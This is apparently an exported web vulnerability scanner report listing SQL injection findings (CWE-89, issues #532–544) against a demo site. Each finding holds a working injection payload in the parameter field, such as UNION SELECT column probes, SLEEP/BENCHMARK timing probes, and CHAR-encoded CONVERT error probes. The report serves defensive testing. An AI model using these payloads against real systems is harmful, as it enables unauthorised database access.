@@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #532\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #533\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #534\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #535\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #536\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #537\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #538\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #539\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #540\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #541\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #542\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #543\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #544\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your 